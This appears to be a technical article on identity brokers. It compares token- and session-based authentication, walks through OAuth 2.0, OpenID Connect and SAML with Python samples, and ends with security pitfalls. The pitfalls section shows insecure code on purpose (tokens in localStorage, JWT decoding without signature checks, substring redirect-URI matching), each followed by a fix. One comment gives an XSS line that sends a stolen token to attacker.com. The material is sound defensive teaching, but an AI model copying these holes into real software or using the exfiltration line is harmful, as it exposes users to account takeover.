- Understanding Identity Brokers
- Token-Based vs Session-Based Authentication
- Protocol Choices: OAuth 2.0, SAML, and OpenID Connect
- Common Pitfalls and Security Issues
- Conclusion
Identity brokers emerged as a solution to authentication sprawl in distributed systems. Rather than each application managing its own user credentials and authentication logic, an identity broker centralizes these concerns, providing single sign-on (SSO) and unified identity management. However, this centralization introduces new architectural challenges: session management complexity, single points of failure, and the delicate balance between security and user experience.
This exploration examines identity broker patterns across enterprise systems, cloud applications, and microservices architectures. We’ll dissect common implementation approaches, evaluate protocol choices between OAuth 2.0, SAML, and OpenID Connect, and understand the trade-offs between token-based and session-based authentication. Drawing from real-world implementations and security incidents, we uncover why identity brokers are both essential and complex.
Understanding Identity Brokers
Before diving into implementation patterns, understanding what identity brokers do and why they exist is essential. An identity broker sits between your applications and identity providers, translating authentication protocols and managing user sessions.
The Core Problem: Authentication Sprawl
Without an identity broker, each application manages authentication independently:
🚫 Problems Without Identity Brokers
Credential Duplication
- Users maintain separate credentials for each application
- Password reuse across systems creates security risks
- Password reset requires contacting each application
- No unified password policy enforcement
Integration Complexity
- Each application implements its own authentication
- Multiple integrations with identity providers
- Inconsistent security implementations
- Difficult to add new identity providers
User Experience Issues
- Users log in separately to each application
- No single sign-on across systems
- Session management inconsistencies
- Logout doesn't propagate across applications
Identity brokers solve these problems by centralizing authentication logic and providing a unified interface to applications.
What Identity Brokers Provide
An identity broker acts as an intermediary between applications and identity providers:
🔑 Identity Broker Capabilities
Protocol Translation
- Applications use one protocol (e.g., OAuth 2.0)
- Identity providers use different protocols (SAML, LDAP, OAuth)
- Broker translates between protocols
- Applications don't need provider-specific code
Single Sign-On (SSO)
- Users authenticate once with the broker
- Broker issues tokens/sessions to applications
- Applications trust the broker's authentication
- Seamless access across multiple applications
Identity Federation
- Connect multiple identity providers
- Users can authenticate with corporate AD, Google, GitHub, etc.
- Broker normalizes user attributes
- Unified identity across providers
Session Management
- Centralized session tracking
- Single logout across all applications
- Session timeout policies
- Concurrent session control
Popular identity brokers include Keycloak, Auth0, Okta, Azure AD, and AWS Cognito.
Token-Based vs Session-Based Authentication
Identity brokers can implement authentication using tokens or sessions, each with distinct trade-offs.
Token-Based Authentication: Stateless and Scalable
Token-based authentication uses cryptographically signed tokens (typically JWTs) to represent authenticated users:
# Token-based authentication flow
from jose import jwt
from datetime import datetime, timedelta
class TokenAuthBroker:
def __init__(self, secret_key):
self.secret_key = secret_key
def authenticate(self, username, password):
# Verify credentials with identity provider
if self.verify_credentials(username, password):
# Issue JWT token
payload = {
'sub': username,
'iat': datetime.utcnow(),
'exp': datetime.utcnow() + timedelta(hours=1),
'roles': self.get_user_roles(username)
}
token = jwt.encode(payload, self.secret_key, algorithm='HS256')
return token
return None
def validate_token(self, token):
try:
payload = jwt.decode(token, self.secret_key, algorithms=['HS256'])
return payload
except jwt.ExpiredSignatureError:
return None
except jwt.JWTError:
return None
# Application validates tokens without contacting broker
def protected_endpoint(request):
token = request.headers.get('Authorization', '').replace('Bearer ', '')
payload = broker.validate_token(token)
if payload:
return f"Welcome {payload['sub']}"
return "Unauthorized", 401
✅ Token-Based Advantages
Stateless Architecture
- No server-side session storage required
- Applications validate tokens independently
- Horizontal scaling without session replication
- No session affinity needed in load balancers
Performance
- No database lookup for each request
- Validation is cryptographic signature check
- Reduced latency for authentication checks
- Lower load on identity broker
Microservices Friendly
- Tokens passed between services
- No shared session store required
- Services validate tokens independently
- Decoupled architecture
However, token-based authentication has significant drawbacks:
⚠️ Token-Based Challenges
Revocation Difficulty
- Tokens valid until expiration
- Cannot immediately revoke compromised tokens
- Logout doesn't invalidate existing tokens
- Requires token blacklist (defeats stateless benefit)
Token Size
- JWTs contain user data and claims
- Sent with every request
- Larger than session IDs
- Bandwidth overhead for mobile clients
Security Risks
- Tokens stored in browser (XSS vulnerability)
- Long-lived tokens increase exposure window
- Token theft allows impersonation until expiration
- Refresh token management complexity
Session-Based Authentication: Stateful but Controllable
Session-based authentication uses server-side sessions with session IDs sent to clients:
# Session-based authentication flow
import secrets
from datetime import datetime, timedelta
class SessionAuthBroker:
def __init__(self):
self.sessions = {} # In production: Redis, database
def authenticate(self, username, password):
# Verify credentials with identity provider
if self.verify_credentials(username, password):
# Create session
session_id = secrets.token_urlsafe(32)
self.sessions[session_id] = {
'username': username,
'created': datetime.utcnow(),
'expires': datetime.utcnow() + timedelta(hours=1),
'roles': self.get_user_roles(username)
}
return session_id
return None
def validate_session(self, session_id):
session = self.sessions.get(session_id)
if session and session['expires'] > datetime.utcnow():
return session
return None
def revoke_session(self, session_id):
# Immediate revocation
if session_id in self.sessions:
del self.sessions[session_id]
return True
return False
# Application checks session with broker
def protected_endpoint(request):
session_id = request.cookies.get('session_id')
session = broker.validate_session(session_id)
if session:
return f"Welcome {session['username']}"
return "Unauthorized", 401
✅ Session-Based Advantages
Immediate Revocation
- Sessions stored server-side
- Logout immediately invalidates session
- Compromised sessions can be revoked instantly
- Fine-grained session control
Smaller Client Storage
- Only session ID sent to client
- Minimal bandwidth overhead
- User data stored server-side
- Reduced XSS exposure
Flexible Session Management
- Update session data without client changes
- Track session activity and location
- Implement concurrent session limits
- Rich session metadata
Session-based authentication also has trade-offs:
⚠️ Session-Based Challenges
Scalability Complexity
- Requires shared session store (Redis, database)
- Session replication across servers
- Load balancer session affinity or sticky sessions
- Horizontal scaling more complex
Performance Overhead
- Database lookup for each request
- Network latency to session store
- Higher load on identity broker
- Potential bottleneck at scale
Distributed System Challenges
- Microservices must call broker for validation
- Network dependency for each request
- Increased latency in service chains
- Broker becomes critical dependency
Hybrid Approach: Short-Lived Tokens with Refresh Tokens
Many modern systems use a hybrid approach combining benefits of both:
# Hybrid authentication with access and refresh tokens
class HybridAuthBroker:
def __init__(self, secret_key):
self.secret_key = secret_key
self.refresh_tokens = {} # Server-side refresh token store
def authenticate(self, username, password):
if self.verify_credentials(username, password):
# Short-lived access token (15 minutes)
access_token = jwt.encode({
'sub': username,
'exp': datetime.utcnow() + timedelta(minutes=15),
'type': 'access'
}, self.secret_key, algorithm='HS256')
# Long-lived refresh token (7 days) stored server-side
refresh_token = secrets.token_urlsafe(32)
self.refresh_tokens[refresh_token] = {
'username': username,
'expires': datetime.utcnow() + timedelta(days=7)
}
return {
'access_token': access_token,
'refresh_token': refresh_token,
'expires_in': 900 # 15 minutes
}
return None
def refresh_access_token(self, refresh_token):
# Validate refresh token (server-side check)
token_data = self.refresh_tokens.get(refresh_token)
if token_data and token_data['expires'] > datetime.utcnow():
# Issue new access token
access_token = jwt.encode({
'sub': token_data['username'],
'exp': datetime.utcnow() + timedelta(minutes=15),
'type': 'access'
}, self.secret_key, algorithm='HS256')
return access_token
return None
def logout(self, refresh_token):
# Revoke refresh token
if refresh_token in self.refresh_tokens:
del self.refresh_tokens[refresh_token]
🎯 Hybrid Approach Benefits
Balanced Security
- Short-lived access tokens limit exposure window
- Compromised access token expires quickly
- Refresh tokens can be revoked immediately
- Logout invalidates refresh token
Performance and Scalability
- Access tokens validated locally (stateless)
- Refresh token checks infrequent (every 15 minutes)
- Reduced load on identity broker
- Scalable like token-based auth
User Experience
- Seamless token refresh in background
- No frequent re-authentication
- Logout works immediately
- Balance between security and convenience
This hybrid approach is used by OAuth 2.0 and OpenID Connect, representing industry best practices.
Protocol Choices: OAuth 2.0, SAML, and OpenID Connect
Identity brokers must support various authentication protocols. Understanding their differences is crucial for implementation decisions.
OAuth 2.0: Authorization Framework
OAuth 2.0 is an authorization framework, not an authentication protocol, though often used for both:
# OAuth 2.0 Authorization Code Flow
from flask import Flask, request, redirect
import requests
app = Flask(__name__)
BROKER_AUTH_URL = 'https://broker.example.com/oauth/authorize'
BROKER_TOKEN_URL = 'https://broker.example.com/oauth/token'
CLIENT_ID = 'your_client_id'
CLIENT_SECRET = 'your_client_secret'
REDIRECT_URI = 'https://app.example.com/callback'
@app.route('/login')
def login():
# Redirect user to identity broker
auth_url = f"{BROKER_AUTH_URL}?client_id={CLIENT_ID}&redirect_uri={REDIRECT_URI}&response_type=code&scope=openid profile email"
return redirect(auth_url)
@app.route('/callback')
def callback():
# Broker redirects back with authorization code
code = request.args.get('code')
# Exchange code for access token
token_response = requests.post(BROKER_TOKEN_URL, data={
'grant_type': 'authorization_code',
'code': code,
'redirect_uri': REDIRECT_URI,
'client_id': CLIENT_ID,
'client_secret': CLIENT_SECRET
})
tokens = token_response.json()
access_token = tokens['access_token']
# Use access token to get user info
user_response = requests.get(
'https://broker.example.com/userinfo',
headers={'Authorization': f'Bearer {access_token}'}
)
user_info = user_response.json()
# Create application session with user_info
return f"Welcome {user_info['name']}"
📋 OAuth 2.0 Characteristics
Designed For
- Delegated authorization
- Third-party API access
- Mobile and web applications
- Modern REST APIs
Advantages
- Simple HTTP-based protocol
- Wide industry adoption
- Mobile-friendly
- Flexible grant types
Limitations
- Not designed for authentication
- No standard user info format
- Requires additional profile endpoint
- Token format not standardized
OpenID Connect: Authentication Layer on OAuth 2.0
OpenID Connect (OIDC) extends OAuth 2.0 specifically for authentication:
# OpenID Connect adds ID token to OAuth 2.0 flow
from jose import jwt
@app.route('/oidc-callback')
def oidc_callback():
code = request.args.get('code')
# Exchange code for tokens
token_response = requests.post(BROKER_TOKEN_URL, data={
'grant_type': 'authorization_code',
'code': code,
'redirect_uri': REDIRECT_URI,
'client_id': CLIENT_ID,
'client_secret': CLIENT_SECRET
})
tokens = token_response.json()
id_token = tokens['id_token'] # OIDC adds ID token
access_token = tokens['access_token']
# Validate and decode ID token
# ID token contains user identity claims
user_claims = jwt.decode(
id_token,
key=get_broker_public_key(),
algorithms=['RS256'],
audience=CLIENT_ID
)
# ID token contains: sub, name, email, etc.
return f"Welcome {user_claims['name']} ({user_claims['email']})"
✅ OpenID Connect Advantages
Purpose-Built for Authentication
- ID token contains user identity
- Standardized user claims
- No additional profile endpoint needed
- Clear authentication semantics
Security Features
- ID token is signed JWT
- Cryptographic validation
- Audience and issuer validation
- Nonce for replay protection
Industry Standard
- Supported by all major identity providers
- Extensive library support
- Well-documented specifications
- Active development and updates
SAML 2.0: Enterprise Standard
SAML (Security Assertion Markup Language) is the traditional enterprise authentication protocol:
# SAML 2.0 authentication flow (simplified)
from lxml import etree
from signxml import XMLVerifier
@app.route('/saml/login')
def saml_login():
# Generate SAML authentication request
saml_request = f"""
<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
ID="{generate_request_id()}"
Version="2.0"
IssueInstant="{datetime.utcnow().isoformat()}Z"
Destination="{BROKER_SSO_URL}">
<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
{SERVICE_PROVIDER_ID}
</saml:Issuer>
</samlp:AuthnRequest>
"""
# Encode and redirect to identity broker
encoded_request = base64.b64encode(saml_request.encode()).decode()
sso_url = f"{BROKER_SSO_URL}?SAMLRequest={encoded_request}"
return redirect(sso_url)
@app.route('/saml/acs', methods=['POST'])
def saml_assertion_consumer():
# Broker posts SAML response back
saml_response = request.form['SAMLResponse']
decoded_response = base64.b64decode(saml_response)
# Validate SAML assertion signature
xml_doc = etree.fromstring(decoded_response)
verified_data = XMLVerifier().verify(
xml_doc,
x509_cert=get_broker_certificate()
).signed_xml
# Extract user attributes from assertion
nameid = xml_doc.find('.//{urn:oasis:names:tc:SAML:2.0:assertion}NameID').text
attributes = extract_saml_attributes(xml_doc)
return f"Welcome {attributes['name']}"
🏢 SAML Characteristics
Designed For
- Enterprise single sign-on
- Federation between organizations
- Legacy enterprise systems
- Strong security requirements
Advantages
- Mature and battle-tested
- Rich attribute exchange
- Strong security features
- Enterprise adoption
Disadvantages
- XML-based (verbose and complex)
- Not mobile-friendly
- Steep learning curve
- Limited modern tooling
Protocol Selection Guide
🎯 Choosing the Right Protocol
Use OpenID Connect When:
- Building new applications
- Need mobile support
- Want modern REST APIs
- Require simple integration
- Target consumer users
Use SAML When:
- Integrating with enterprise systems
- Required by corporate IT policies
- Need rich attribute exchange
- Federation with other organizations
- Legacy system compatibility required
Use OAuth 2.0 When:
- Need API authorization (not authentication)
- Third-party access to resources
- Delegated permissions
- Combined with OIDC for authentication
Modern identity brokers like Keycloak support all three protocols, allowing applications to choose based on their needs.
Common Pitfalls and Security Issues
Identity broker implementations often suffer from common security vulnerabilities and design mistakes.
Pitfall 1: Storing Tokens in Local Storage
Many applications store tokens in browser local storage, creating XSS vulnerabilities:
// ❌ INSECURE: Storing tokens in local storage
function login(username, password) {
fetch('/api/login', {
method: 'POST',
body: JSON.stringify({ username, password })
})
.then(res => res.json())
.then(data => {
// Vulnerable to XSS attacks
localStorage.setItem('access_token', data.access_token);
localStorage.setItem('refresh_token', data.refresh_token);
});
}
// Any XSS vulnerability can steal tokens
// <script>
// fetch('https://attacker.com/steal?token=' + localStorage.getItem('access_token'));
// </script>
🚫 Local Storage Vulnerabilities
XSS Attack Vector
- JavaScript can access local storage
- Any XSS vulnerability exposes tokens
- Third-party scripts can steal tokens
- No protection against script injection
Impact
- Complete account takeover
- Tokens valid until expiration
- Attacker can impersonate user
- Difficult to detect theft
Better approach using HTTP-only cookies:
// ✅ SECURE: Using HTTP-only cookies
// Server sets HTTP-only cookie (JavaScript cannot access)
@app.route('/api/login', methods=['POST'])
def login():
data = request.json
tokens = broker.authenticate(data['username'], data['password'])
response = make_response({'status': 'success'})
# HTTP-only cookie prevents JavaScript access
response.set_cookie(
'access_token',
tokens['access_token'],
httponly=True, # Prevents JavaScript access
secure=True, # HTTPS only
samesite='Strict' # CSRF protection
)
return response
// Client-side: No token handling needed
function login(username, password) {
fetch('/api/login', {
method: 'POST',
credentials: 'include', // Send cookies
body: JSON.stringify({ username, password })
});
}
Pitfall 2: Missing Token Validation
Applications sometimes skip proper token validation:
# ❌ INSECURE: Trusting token without validation
@app.route('/api/user')
def get_user():
token = request.headers.get('Authorization', '').replace('Bearer ', '')
# Decoding without verification!
payload = jwt.decode(token, options={"verify_signature": False})
return {'user': payload['sub']} # Attacker can forge tokens!
🚫 Validation Failures
Missing Signature Verification
- Attacker can create fake tokens
- No cryptographic validation
- Complete authentication bypass
Missing Expiration Check
- Expired tokens still accepted
- Stolen tokens valid indefinitely
- No time-based security
Missing Audience Validation
- Tokens from other applications accepted
- Cross-application token reuse
- Privilege escalation risks
Proper token validation:
# ✅ SECURE: Complete token validation
from jose import jwt, JWTError
@app.route('/api/user')
def get_user():
token = request.headers.get('Authorization', '').replace('Bearer ', '')
try:
payload = jwt.decode(
token,
key=get_public_key(),
algorithms=['RS256'], # Specify allowed algorithms
audience='my-application', # Validate audience
issuer='https://broker.example.com' # Validate issuer
)
# Token is valid and verified
return {'user': payload['sub']}
except jwt.ExpiredSignatureError:
return {'error': 'Token expired'}, 401
except jwt.JWTClaimsError:
return {'error': 'Invalid claims'}, 401
except JWTError:
return {'error': 'Invalid token'}, 401
Pitfall 3: Insecure Redirect URIs
OAuth 2.0 redirect URI validation is critical for security:
# ❌ INSECURE: Weak redirect URI validation
@app.route('/oauth/authorize')
def authorize():
client_id = request.args.get('client_id')
redirect_uri = request.args.get('redirect_uri')
# Weak validation: substring match
if 'example.com' in redirect_uri:
# Generate authorization code
code = generate_auth_code(client_id)
return redirect(f"{redirect_uri}?code={code}")
return "Invalid redirect URI", 400
# Attacker can use: https://evil.com?victim=example.com
# Validation passes, code sent to attacker!
🚫 Redirect URI Vulnerabilities
Open Redirect
- Authorization codes sent to attacker
- Account takeover possible
- Phishing attacks enabled
Subdomain Attacks
- Weak validation allows subdomains
- Attacker registers malicious subdomain
- Steals authorization codes
Secure redirect URI validation:
# ✅ SECURE: Strict redirect URI validation
REGISTERED_CLIENTS = {
'client123': {
'redirect_uris': [
'https://app.example.com/callback',
'https://app.example.com/oauth/callback'
]
}
}
@app.route('/oauth/authorize')
def authorize():
client_id = request.args.get('client_id')
redirect_uri = request.args.get('redirect_uri')
# Exact match against registered URIs
client = REGISTERED_CLIENTS.get(client_id)
if not client or redirect_uri not in client['redirect_uris']:
return "Invalid redirect URI", 400
code = generate_auth_code(client_id)
return redirect(f"{redirect_uri}?code={code}")
Conclusion
Identity brokers centralize authentication in distributed systems, providing single sign-on, protocol translation, and unified identity management. However, implementation choices significantly impact security, performance, and user experience.
The choice between token-based and session-based authentication involves fundamental trade-offs. Token-based authentication offers stateless scalability and microservices compatibility but struggles with revocation and security risks. Session-based authentication provides immediate revocation and fine-grained control but introduces scalability complexity. The hybrid approach using short-lived access tokens with server-side refresh tokens represents industry best practices, balancing security, performance, and user experience.
Protocol selection depends on your environment and requirements. OpenID Connect is the modern standard for new applications, offering simple integration, mobile support, and purpose-built authentication. SAML remains essential for enterprise integration and legacy systems despite its complexity. OAuth 2.0 serves authorization needs but requires OpenID Connect for proper authentication.
Common pitfalls plague identity broker implementations. Storing tokens in local storage creates XSS vulnerabilities—use HTTP-only cookies instead. Missing token validation allows attackers to forge tokens—always verify signatures, expiration, audience, and issuer. Weak redirect URI validation enables authorization code theft—use exact matching against registered URIs.
Identity brokers are essential infrastructure for modern distributed systems, but they require careful implementation. Understanding the trade-offs between authentication approaches, choosing appropriate protocols, and avoiding common security pitfalls ensures your identity broker enhances rather than undermines your security posture. The complexity is justified by the benefits: unified authentication, improved user experience, and centralized security controls across your entire application ecosystem.